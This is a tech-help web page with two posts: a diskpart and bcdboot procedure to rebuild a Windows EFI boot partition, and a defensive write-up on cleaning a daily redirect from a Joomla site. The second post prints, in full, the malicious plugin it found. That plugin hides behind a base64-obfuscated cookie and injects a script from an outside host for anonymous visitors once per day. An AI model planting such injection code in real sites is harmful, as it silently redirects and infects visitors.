Open menu
  • Beranda
  • Project
    • Kementan
    • BSSN
    • Kemenkeu
    • Bappenas
    • CPD Cigudeg
    • Kumham
    • Pelni
  • Tutorials
    • Elektrik
    • Sipils
    • Optimasi SEO
    • Windows
  • Privacy Policy
  • About
  • Search

logo-nkm

Tutorial
  • Kelistrikan
    • Menghitung Kuat Hantar Arus Kabel Tembaga
    • Menghitung Daya Maksimal Kern Trafo Toroid
    • Rumus Berat Kern Toroid
    • Rumus Berat Kawat email / Kabel
    • Desain Amplifier Yang Baik Benar
    • Prosedur pembuatan trafo toroid
    • Menentukan diameter gulungan primer dan sekunder
    • Penerapan hukum ohm untuk audio power amplifier
    • Menghitung kebutuhan solarcel untuk kebutuhan rumahan
    • Mengenal Kelas Audio Amplifier
    • Daya Listrik 1 Phasa dan 3 Phasa VA VAR dan WATT
    • Prosedur / perhitungan pembuatan trafo EI atau Kotak
    • Menghitung kebutuhan kabel dan MCB atau MCCB 1 Phasa dan 3 Phasa...
  • Sipil
    • Menghitung kebutuhan bata merah hebel dan batako
    • Menghitung kebutuhan baja ringan
    • Menghitung kebutuhan semen dan pasir untuk Plester dan aci
    • Menghitung Kebutuhan Material Cor Beton Slof,Tiang dan Cakar Ayam
  • Campuran
    • Cara cek saldo emoney flazz brizzi tap cash jack card dan lainya
    • Toroid transformer formulas and calculations with the "Calculate Toroidal Transformer" application
  • SEO
  • Hitungan Jawa Kuno
  • Error Solved
    • How to fix website redirect in first visit every day?
  • Surah
  • Tahlil

Cannot boot windows 10, “bootrec /fixboot” gives “access denied”

Hits: 788

Cannot boot windows 10, “bootrec /fixboot” gives “access denied”

Stuck in "Starting Windows"

Cannot Booting Windows 7, 8,10,11

Repair Windows in command promt, Delete UEFI partition and recreate again...

diskpart
lis vol  <- note which drive letter your Windows partition is assigned
lis dis <- note the disk number of the drive containing your EFI system partition
sel dis # <- replace # with the drive identified above
lis par <- note which partition is the EFI System partition
sel par # <- replace # with the partition number identified above
del par override
cre par EFI
for fs=FAT32 quick
assign letter=s
exit
bcdboot C:\Windows /s S: /f UEFI <- note may need to change C: to the drive letter identified above
exit

How to fix website redirect in first visit every day?

Hits: 1223
 

How to fix website redirect in first visit every day?

Every time I visit the first website, the web is redirected to the site  https://jqscr.com/xxxxxx

After I checked, the web source before being redirected, it turns out that the contents are as follows:

<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
<script>
var khutmhpx = document.createElement("script");
khutmhpx.src = "https://jqscr.com/XXmzhSV3";
document.getElementsByTagName("head")[0].appendChild(khutmhpx);
</script>
<!DOCTYPE html>
<html lang="en-gb" dir="ltr">
<head>
........
</head>
.......

There are several scripts tucked into the head

<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
<script>
var khutmhpx = document.createElement("script");
khutmhpx.src = "https://jqscr.com/XXmzhSV3";
document.getElementsByTagName("head")[0].appendChild(khutmhpx);
</script>

Then I look for the source of the script. After several days of searching the file manager, I finally found the source of the redirect script.

The script source is at: "/plugins/system/settings/settings.php"

The contents of the settings.php are as follows:

<?php
defined('_JEXEC') or die;
class plgSystemSettings extends JPlugin
{
public function onAfterInitialise()
{
$user = JFactory::getUser();
$mainframe = JFactory::getApplication();
if ( $user -> id > 0 ) {
    // user route
} else {
    // non-user route
    $current_url = JUri::getInstance();
    if (stristr($current_url, "/admin")) {
        // admin-panel route
    } else {
            
        if ( ! isset( $_COOKIE[base64_decode('cl9vaw==')]) ) {
            setcookie( base64_decode( 'cl9vaw==' ), 1, time() + 86400, base64_decode( 'Lw==' ) );
            echo '
            <script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
            <script>
            var khutmhpx = document.createElement("script");
            khutmhpx.src = "https://jqscr.com/XXxxxXXn";
            document.getElementsByTagName("head")[0].appendChild(khutmhpx);
            </script>
            ';
        }
    }
}


}
}

To solve the redirect problem, delete some scripts in the settings.php file so that it looks like the following:

<?php

defined('_JEXEC') or die;
class plgSystemSettings extends JPlugin
{
public function onAfterInitialise()
{
$user = JFactory::getUser();
$mainframe = JFactory::getApplication();
}
}

Then deactivate the plugin settings in your Joomla administrator.

Menu
  • Contact Us
  • Site Map
  • Download
  • Login
Artikel Lainya
  • Calculate Toroidal Transformer
    • CTT Privacy Policy
    • CTT Terms & Conditions
    • Rumus dan perhitungan trafo toroid dengan aplikasi "Calculate Toroidal Transformer"
  • Campuran
    • Email Program Pengungkapan Sukarela dari DJP
    • Cara cek saldo emoney flazz brizzi tap cash jack card dan lainya
    • Game yang bagus untuk mengasah kemampuan otak.....
    • Tatal Jawa / Tatal Jowo
    • Cara mengatasi error BNI Direct "Error Message:APR-1110050-Authentication Failed"
    • Toroid transformer formulas and calculations with the "Calculate Toroidal Transformer" application
    • Perbaiki Bor Makita HR 2230 Keluar percikan api dan bau gosong
    • Tidak bisa buka atau akses efilling djp online? Ini dia solusinya
    • Tidak bisa buat spt baru tahun 2022 di eSPT tahunan Badan ? ini dia solusinya
    • Tidak terima Surat Tagihan Pajak STP tetapi di telepon 1500200, katanya STP sudah jatuh tempo
    • Hitungan Weton / Kelahiran Jawa Kuno
    • Cara Mengajukan Klaim Asuransi Jasaraharja
    • Perhitungan Selametan Orang Meninggal
    • Upgrade dell optiplex Boot Windows via SSD PCIe NVME Boot Windows on 11 second
    • Penanggalan Jawa atau Kalender Jawa
  • Elektrikal
    • Menghitung Kuat Hantar Arus Kabel Tembaga
    • Menghitung Daya Maksimal Kern Trafo Toroid
    • Rumus Berat Kern Trafo Toroid
    • Rumus Berat Kawat email / Kabel
    • Desain Amplifier Yang Baik Benar
    • Prosedur pembuatan trafo toroid
    • Menentukan diameter gulungan primer dan sekunder
    • Penerapan hukum ohm untuk audio power amplifier
    • Menghitung kebutuhan solarcel untuk kebutuhan rumahan
    • Mengenal Kelas Audio Amplifier
    • Daya Listrik 1 Phasa dan 3 Phasa VA VAR dan WATT
    • Prosedur / perhitungan pembuatan trafo EI atau Kotak
    • Menghitung kebutuhan kabel dan MCB atau MCCB 1 Phasa dan 3 Phasa...
    • Yang menentukan ampere sebuah trafo....
    • Tegangan VGH VGL AVDD VAA VDDAN pada Tcon TV LED 40 Inch
    • Cara memasang saklar hotel / saklar tukar 1 Lampu dengan 2 saklar atau lebih
    • Rangkaian Panel Pompa Star Delta
    • Membuat sendiri trafo toroid atau donat 10A CT 45V
    • Cara membuat trafo toroid 20A CT 65V
    • Cara membuat trafo toroid atau donat 30A CT 72V
    • Cara membuat trafo toroid 15A CT 55V
    • Menghitung panjang kawat/lilitan yang dibutuhkan untuk membuat trafo toroid
    • Menghitung hambatan/ resistansi lilitan primer trafo dengan rumus
    • Menghitung kebutuhan listrik Trafo 10A, 20A, dan 30 Ampere
    • Ukuran Kern Trafo Toroid 5 A
    • Ukuran kern trafo toroid 10A
    • Ukuran kern yang sesuai untuk trafo toroid / donat 15A
    • Ukuran kern yang sesuai untuk trafo toroid / donat 20A
    • Ukuran kern yang sesuai untuk trafo toroid / donat 25A
    • Tidak bisa isi token pulsa listrik karena muncul tulisan "Periksa" di meteran PLN
    • Ukuran kern yang sesuai untuk trafo toroid / donat 30A
  • Error Solved
    • How to fix website redirect in first visit every day?
    • Cannot boot windows 10, “bootrec /fixboot” gives “access denied”
  • Network
    • Cara Crimping dan pasang Kabel LAN dengan Urutan warna kabel yang benar
  • SEO
    • Cara mendapat backlink gratis....
    • Cara mudah di approve / disetujui google Adsense
  • Sipil
    • Menghitung kebutuhan bata merah hebel dan batako
    • Menghitung kebutuhan baja ringan
    • Menghitung kebutuhan semen dan pasir untuk Plester dan aci
    • Menghitung Kebutuhan Material Untuk Cor beton tiang dan slof
  • Surah
    • Surat Yasin
    • Surat Al Waqiah
    • Surat Al Kahfi
    • Surat Al Mulk
    • Surat Ar Rahman
    • Surat Al Baqarah
    • Surat Al Fatihah
    • Surat An Naba'
    • Surat Al Qariah
    • Surat An Nas
    • Surat At Tin
    • Surat An Nasr
  • Tahlilan
    • Bacaan Tahlil lengkap
Categories
  • Elektrikal
  • Sipil
  • SEO
  • Network
  • Windows
  • Komputer
  1. Home
  2. Error Solved